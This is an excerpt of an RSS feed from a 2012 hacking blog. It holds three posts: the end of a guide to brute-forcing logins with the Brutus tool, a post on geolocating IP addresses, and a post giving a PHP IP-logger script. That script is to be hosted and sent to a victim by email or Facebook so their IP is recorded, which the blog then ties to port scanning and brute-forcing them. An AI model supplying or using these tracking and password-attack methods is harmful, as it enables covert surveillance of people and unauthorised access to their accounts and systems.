&lt;li style="outline: none medium;"&gt;&amp;nbsp;Does the target service require a single token (e.g. just a password) or multiple tokens (e.g. Username &amp;amp; password &amp;amp; domain?) (Single tends to be easier)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&amp;nbsp;Does the target service feature account lockouts or large delays before returning the result of the authentication attempt? (Yes is bad)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&amp;nbsp;Does the target service allow us to maintain a persistant connection? (Yes is good)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&amp;nbsp;Is the service supported by Brutus, if not can it be defined? (Yes is essential)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&amp;nbsp;Will a positive authentication against the service actually be useful for the overall objective? (Yes helps)&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&lt;br /&gt;
Basically, the fastest most reliable attack method is always the one to choose if you have a choice. Generally trouble free methods include HTTP (Basic Auth) which is pretty fast, does not include lockouts or authentication delays - however the results may not be much use as often HTTP (Basic Auth) account information is separate from system account databases. The fastest remote service I have found to date is NetBus! Not only is it incredibly quick to authenticate against but a successful password aquisition will yield extreme target penetration.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;I still don't get it, what does it do?&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Find some service where you need to enter your username and password to gain access, type in a username and password and see what happens, then do it again, and again, and again, and again until you gain access and are positivley authenticated or until you get bored. Pretty straightforward really.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;FEATURES&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;blockquote class="" style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;&lt;ul style="outline: none medium;"&gt;&lt;li style="outline: none medium;"&gt;Support for up to 60 simultaneous sessions&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Fully multi-threaded&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Highly customisable authentication sequences&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Single user mode, User List mode, User/Pass combo mode, Password only mode&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Brute force password mode&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Word list&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;creation/generation/processing&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Import/Export custom services&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Load/Save position&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;SOCKS support (with optional authentication)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;Capable of 2500+ authentications/second over high speed connections&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;SOME TIPS TO GET THE BEST RESULT&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DONT use lots of simultaneous connections unless it's beneficial to do so&amp;nbsp;&lt;/b&gt;- Usually slow responding targets (like many POP3 servers which have 10 second + failure notification times) are the best candidates.&lt;br /&gt;
&lt;br /&gt;
There are many variables to take into account, connection speed, authentication notification speed, server capacity, even your machine's capacity in some scenarios. Very often you will find less connections will give you more speed...this is important.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DON'T use the keepalive/stayconnected options if you are having problems&amp;nbsp;&lt;/b&gt;- it is usually better to troubleshoot these things in one authentication per connection mode.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DO use keepalive/stay connected options if you can&lt;/b&gt;&amp;nbsp;-they can greatly increase speed.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DO use positive authentication responses in your custom sequences&lt;/b&gt;&amp;nbsp;- they are usually more reliable.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DO take note of&amp;nbsp;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;the error&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;indicators in the bottom right of the brutus main window&lt;/b&gt;&amp;nbsp;-if they are flashing too often then consider changing some settings.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DO use a network sniffer if you can&amp;nbsp;&lt;/b&gt;- to understand and troubleshoot authentication sequences to various services. Also consider using netcat or telnet to 'manually' authenticate against a service to see exactly what the server is responding with and what you need to tell it.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;DO create custom&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;word lists&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;for your specific targets&amp;nbsp;&lt;/b&gt;– If the target user(s) is/are known then create user specific wordlists using the built in password generator. Using target specific lists in conjunction with perhaps a list of&amp;nbsp;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;common&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;passwords probably offers you the best chance of positive authentication in a reasonable amount of time.&lt;/div&gt;&lt;/div&gt;&lt;div style="clear: both; outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;div class="post-footer-line post-footer-line-1" style="outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eELKCQ4KPXwOAzZ3OnbL2TNkXbWj5qs-D7PVaXp9FkZIGJrotiAiaEcBhmEaaIuOOXkLIqiuZHzkEjQSTpNIybvgJJz4gEPvPYlpwG4PxYxt-TtUGcRNDgiTEdA6ClcAoB8fEWGQKtM/s72-c/p.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Trace any ip address and view its full details</title><link>http://latest-cracker.blogspot.com/2012/06/trace-any-ip-address-and-view-its-full.html</link><category>ip address</category><pubDate>Fri, 15 Jun 2012 16:49:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-8231042068689377220</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;div style="font-family: inherit; outline: none medium;"&gt;&lt;a href="http://data-centers.in/wp-content/uploads/2009/11/KVM-over-IP-1.jpg" imageanchor="1" style="clear: right; color: #0e0f0f; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium; text-decoration: none;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;img border="0" height="234" src="http://data-centers.in/wp-content/uploads/2009/11/KVM-over-IP-1.jpg" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="320" /&gt;&lt;/a&gt;&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;TRACE ANY IP ADDRESS&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Once you obtain this IP&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;address it&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.&lt;br /&gt;
&lt;br /&gt;
Just go to&amp;nbsp;&lt;a href="http://www.ip2location.com/demo.aspx" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_'blank'"&gt;http://www.ip2location.com/demo.aspx&lt;/a&gt;&amp;nbsp;and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of&amp;nbsp;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;a button&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;you can find the following information for&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;any given&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;IP address&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium;"&gt;&lt;br /&gt;
1. Country in which the IP is located&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium;"&gt;&lt;br /&gt;
2. Region&lt;br /&gt;
&lt;br /&gt;
3. City&lt;br /&gt;
&lt;br /&gt;
4. Latitude/Longitude&lt;br /&gt;
&lt;br /&gt;
5. Zip Code&lt;br /&gt;
&lt;br /&gt;
6. Time Zone&lt;br /&gt;
&lt;br /&gt;
7. Name of the ISP&lt;br /&gt;
&lt;br /&gt;
8. Internet Speed&lt;br /&gt;
&lt;br /&gt;
9.&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Weather Station&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
10.&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Area Code&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and&lt;br /&gt;
&lt;br /&gt;
11. Domain name associated with the IP address.&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; outline: none medium; text-align: left;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Finding IP Address Of Anyone-Exposed Trick</title><link>http://latest-cracker.blogspot.com/2012/06/finding-ip-address-of-anyone-exposed.html</link><category>ip address</category><category>network hacking</category><pubDate>Fri, 15 Jun 2012 16:46:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-15268091293450300</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" id="post-body-5726429296083034839" style="font-family: Philosopher, arial, serif; font-size: 17px; line-height: 22px; margin: 0px; outline: none medium; padding: 0px; text-shadow: rgb(255, 255, 255) 0px 1px 1px;"&gt;&lt;div dir="ltr" style="outline: none medium;" trbidi="on"&gt;&lt;div style="outline: none medium; text-align: justify;"&gt;Well, When talk about hacking someone the first thing comes to our mind will be about how to&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;find the IP address&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;of the person.Finding&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;the IP&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;address is the only way to attack a remote system.We have already discussed some techniques like&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/track-and-get-details-of-anyone-just-by.html" style="color: blue; outline: none medium;" target="_blank"&gt;How to track any one get their details by sending email&lt;/a&gt;. and&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/best-way-to-track-email-sent-by-you.html" style="color: blue; outline: none medium;" target="_blank"&gt;Tracking using Spypig&amp;nbsp;&lt;/a&gt;and some alternate ways to find ip by any means by email or through websites or blog or forums. You can also read this,&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/how-to-find-ip-address-of-anyone-and.html" style="color: blue; outline: none medium;" target=""&gt;The easiest way to get the ip of anyone.&lt;/a&gt;&amp;nbsp;For hacking anyone, the first stage is, of course, collecting information about the victim. This stage mainly consists of finding IP Address of the victim, so that you can perform further hacks like Port scanning, Netbios, etc using&amp;nbsp;the IP&amp;nbsp;Address.Here I am providing you the exact script to&amp;nbsp;find the IP address&amp;nbsp;of remote system.&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;STEP BY STEP INSTRUCTIONS&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="outline: none medium; text-align: justify;"&gt;&lt;b style="outline: none medium;"&gt;1&lt;/b&gt;&amp;nbsp;. For finding&amp;nbsp;the IP&amp;nbsp;address of a remote system, You need 2 files&lt;br /&gt;
&lt;ul style="outline: none medium;"&gt;&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;PHP SCRIPT FILE&lt;/b&gt;&amp;nbsp;( for fetching&amp;nbsp;the ip&amp;nbsp;address of remote PC )&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;TEXT FILE&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/b&gt;( To save&amp;nbsp;the IP&amp;nbsp;details in the form of text )&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;2&lt;/b&gt;. Below is the&lt;b style="outline: none medium;"&gt;&amp;nbsp;php&amp;nbsp;&lt;/b&gt;script to&amp;nbsp;find the IP address&amp;nbsp;of anyone.Just copy the below script, paste it to notepad and save it as&amp;nbsp;&lt;b style="outline: none medium;"&gt;PHP&lt;/b&gt;, that is with the extension .php. or download the file&amp;nbsp;&lt;a href="http://www.ziddu.com/download/19669652/IPFinder.rar.html" style="color: blue; outline: none medium;" target="_blank"&gt;from here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codebox" style="-webkit-box-shadow: rgb(204, 204, 204) 8px 8px 8px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-position: initial initial; background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dashed rgb(187, 187, 187); box-shadow: rgb(204, 204, 204) 8px 8px 8px; color: white; margin: 10px; outline: none medium; padding: 5px; text-align: left;"&gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
&lt;br /&gt;
$dt = date("l dS \of F Y h:i:s A");&lt;br /&gt;
&lt;br /&gt;
$file=fopen("log.txt","a");&lt;br /&gt;
&lt;br /&gt;
$data = $ip.' '.$dt."\n";&lt;br /&gt;
&lt;br /&gt;
fwrite($file, $data);&lt;br /&gt;
&lt;br /&gt;
fclose($file);&lt;br /&gt;
&lt;br /&gt;
header( 'Location: http://www.google.com' ) ;&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;3.&lt;/b&gt;&amp;nbsp;Now just create a log.&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;txt file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;( use the name mentioned in the&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;php file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;) .&lt;/div&gt;&lt;br /&gt;
&lt;div style="outline: none medium; text-align: justify;"&gt;&lt;b style="outline: none medium;"&gt;4.&lt;/b&gt;&amp;nbsp;Upload these 2 files, thatis the log.txt and&amp;nbsp;php file&amp;nbsp;to any of the free hosting services and use the&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;direct link&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;of the&amp;nbsp;php file&amp;nbsp;to target&amp;nbsp;the ip&amp;nbsp;of any system. If any one clicks on this&amp;nbsp;php file&amp;nbsp;their IP and other details will be recorded in your log.txt file. Its all depends on your creativity to how to use this by either by email or using facebook or anyother.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;NOTE:&amp;nbsp;&lt;/b&gt;In the last line of&amp;nbsp;php file&amp;nbsp;there is a field called location. It is the Redirect URL for you&amp;nbsp;php file.That is here if any one clicks onthis&amp;nbsp;php file&amp;nbsp;they will automatically redirected to www.google.com. You can use your own links like youtube videos or anyother.&lt;br /&gt;
&lt;br /&gt;
Once you obtained IP address of anyone&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/trace-any-ip-address-and-view-its-full.html" rel="nofollow" style="color: blue; outline: none medium;" target="_blank"&gt;you can trace the full details&amp;nbsp;&lt;/a&gt;or You can even try to&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/brute-force-attack-to-hack-passwords-of.html" style="color: blue; outline: none medium;" target="_blank"&gt;Brute force attak that IP&lt;/a&gt;&amp;nbsp;if you know more personal details about the person using that ip.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;SECURITY MEASURES&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
So far we have discussed about ways of finding any remote IP and attacking it. But to keep ourselves secure from such IP based attacks you need to be in internet anonymously. That is by hiding all your personal details. You can achieve this by using some proxy servers or using some IP hiding softwares.You can also read this&amp;nbsp;&lt;a href="http://latest-cracker.blogspot.in/2012/06/anonymous-web-browsing-using-super-hide.html" style="color: blue; outline: none medium;" target="_blank"&gt;Anonymous web browsing using Super Hide IP&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="clear: both; outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;div class="post-footer-line post-footer-line-1" style="outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/span&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>NETWORK HACKING :PING,NETSTAT,TELNET (ETHICAL HACKING)</title><link>http://latest-cracker.blogspot.com/2012/06/network-hacking-pingnetstattelnet.html</link><category>network hacking</category><pubDate>Mon, 11 Jun 2012 00:54:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-257554676806227420</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px;"&gt;note:- this is only for education purpose&lt;/span&gt;&lt;br /&gt;
